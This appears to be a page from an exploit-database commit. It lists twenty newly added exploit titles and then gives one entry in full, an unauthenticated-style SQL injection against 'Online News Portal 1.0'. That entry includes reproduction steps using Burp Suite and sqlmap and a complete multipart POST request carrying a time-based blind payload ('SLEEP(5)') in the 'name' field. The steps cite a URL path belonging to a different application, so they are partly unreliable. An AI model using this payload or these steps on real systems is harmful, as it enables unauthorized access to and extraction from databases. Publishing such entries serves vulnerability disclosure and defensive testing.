d85f0c8d35
20 changes to exploits/shellcodes KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated) BRAdmin Professional 3.75 - 'BRA_Scheduler' Unquoted Service Path Eclipse Mosquitto MQTT broker 2.0.9 - 'mosquitto' Unquoted Service Path SOYAL 701 Server 9.0.1 - Insecure Permissions SOYAL 701 Client 9.0.1 - Insecure Permissions KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access Plone CMS 5.2.3 - 'Title' Stored XSS LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS Boonex Dolphin 7.4.2 - 'width' Stored XSS Profiling System for Human Resource Management 1.0 - Remote Code Execution (Unauthenticated) VestaCP 0.9.8 - 'v_sftp_licence' Command Injection SOYAL Biometric Access Control System 5.0 - Master Code Disclosure SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated) Online News Portal 1.0 - 'name' SQL Injection Online News Portal 1.0 - 'Multiple' Stored Cross-Site Scripting
41 lines
No EOL
1.5 KiB
Text
41 lines
No EOL
1.5 KiB
Text
# Exploit Title: Online News Portal 1.0 - 'name' SQL Injection
|
|
# Exploit Author: Richard Jones
|
|
# Date: 2021-03-18
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/14741/online-news-portal-using-phpmysqli-free-download-source-code.html
|
|
# Software Link: https://www.sourcecodester.com/download-code?nid=14741&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code+Free+Download
|
|
# Version: 1.0
|
|
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
|
|
|
|
# Steps
|
|
# Add a new product: http://127.0.0.1/pos_inv/supplier/addproduct.php
|
|
# Save request in BurpSuite
|
|
# Run saved request with sqlmap -r sql.txt
|
|
|
|
|
|
---
|
|
Parameter: MULTIPART name ((custom) POST)
|
|
Type: time-based blind
|
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
|
Payload: -----------------------------15280280330873390203691218429
|
|
Content-Disposition: form-data; name="name"
|
|
|
|
aasd' AND (SELECT 1775 FROM (SELECT(SLEEP(5)))Jpba) AND 'EaFY'='EaFY
|
|
-----------------------------15280280330873390203691218429
|
|
Content-Disposition: form-data; name="category"
|
|
|
|
1
|
|
-----------------------------15280280330873390203691218429
|
|
Content-Disposition: form-data; name="price"
|
|
|
|
asd
|
|
-----------------------------15280280330873390203691218429
|
|
Content-Disposition: form-data; name="qty"
|
|
|
|
asd
|
|
-----------------------------15280280330873390203691218429
|
|
Content-Disposition: form-data; name="image"; filename=""
|
|
Content-Type: application/octet-stream
|
|
|
|
|
|
-----------------------------15280280330873390203691218429--
|
|
--- |